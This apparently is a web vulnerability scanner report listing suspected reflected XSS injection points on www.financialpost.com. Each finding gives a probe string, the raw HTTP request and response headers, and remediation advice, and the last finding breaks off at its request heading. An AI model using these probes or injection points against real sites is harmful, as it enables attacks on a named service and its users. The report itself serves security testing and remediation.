The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fbcf'%3b08c724ddf76 was submitted in the REST URL parameter 2. This input was echoed as 6fbcf';08c724ddf76 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/mortgages6fbcf'%3b08c724ddf76/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43533
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 955f6'%3bc2602442ea2 was submitted in the REST URL parameter 1. This input was echoed as 955f6';c2602442ea2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance955f6'%3bc2602442ea2/rrsp/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37625
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c4ce'%3b6614dfb9b81 was submitted in the REST URL parameter 2. This input was echoed as 8c4ce';6614dfb9b81 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/rrsp8c4ce'%3b6614dfb9b81/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37589
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26db8'%3bf32aae1b234 was submitted in the REST URL parameter 1. This input was echoed as 26db8';f32aae1b234 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance26db8'%3bf32aae1b234/taxes/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37646
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6f5'%3bf7f2d80e163 was submitted in the REST URL parameter 2. This input was echoed as cb6f5';f7f2d80e163 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/taxescb6f5'%3bf7f2d80e163/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43453
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad0d8'%3b873e41b709c was submitted in the REST URL parameter 1. This input was echoed as ad0d8';873e41b709c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-financead0d8'%3b873e41b709c/tfsa/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37625
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c288d'%3bf31757b7249 was submitted in the REST URL parameter 2. This input was echoed as c288d';f31757b7249 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/tfsac288d'%3bf31757b7249/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43434
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1824'%3b04bbb0195ae was submitted in the REST URL parameter 1. This input was echoed as c1824';04bbb0195ae in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-financec1824'%3b04bbb0195ae/wealthy-boomer/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43669
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bc04'%3b8e4687f8240 was submitted in the REST URL parameter 2. This input was echoed as 3bc04';8e4687f8240 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/wealthy-boomer3bc04'%3b8e4687f8240/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43634
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba345'%3bf7da2fb428a was submitted in the REST URL parameter 1. This input was echoed as ba345';f7da2fb428a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-financeba345'%3bf7da2fb428a/your-money/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43589
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0f3d'%3bb50d399473c was submitted in the REST URL parameter 2. This input was echoed as f0f3d';b50d399473c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/your-moneyf0f3d'%3bb50d399473c/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37710
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3eba5'%3b318d557f68 was submitted in the REST URL parameter 1. This input was echoed as 3eba5';318d557f68 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts3eba5'%3b318d557f68/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:08:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36303
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 175fc'%3b71ae79ca80c was submitted in the REST URL parameter 1. This input was echoed as 175fc';71ae79ca80c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /related175fc'%3b71ae79ca80c/topics/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43312
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70f14'%3bead8597857b was submitted in the REST URL parameter 2. This input was echoed as 70f14';ead8597857b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /related/topics70f14'%3bead8597857b/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43275
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10296'%3bc7eb73c65eb was submitted in the REST URL parameter 3. This input was echoed as 10296';c7eb73c65eb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /related/topics/10296'%3bc7eb73c65eb HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43317
The value of the subject request parameter is copied into an HTML comment. The payload 85ce5-->cda0818e7d9 was submitted in the subject parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /related/topics/index.html?subject=Sasha+Khan85ce5-->cda0818e7d9&type=Person HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 69308 Expires: Sun, 19 Dec 2010 03:16:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:16:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <!-- Source="/scripts/sp6query.aspx?catalog=ntnp&type=stry&tags=Person|Sasha Khan85ce5-->cda0818e7d9" --> ...[SNIP]...
The value of the type request parameter is copied into an HTML comment. The payload f93a8-->68984d528c3 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /related/topics/index.html?subject=Sasha+Khan&type=Personf93a8-->68984d528c3 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 69286 Expires: Sun, 19 Dec 2010 03:16:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:16:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <!-- Source="/scripts/sp6query.aspx?catalog=ntnp&type=stry&tags=Personf93a8-->68984d528c3|Sasha Khan" --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65f4e'%3b3aea91e1e6a was submitted in the REST URL parameter 1. This input was echoed as 65f4e';3aea91e1e6a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /scripts65f4e'%3b3aea91e1e6a/include.aspx HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43139
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c19b1'%3ba1b3409a31b was submitted in the REST URL parameter 2. This input was echoed as c19b1';a1b3409a31b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
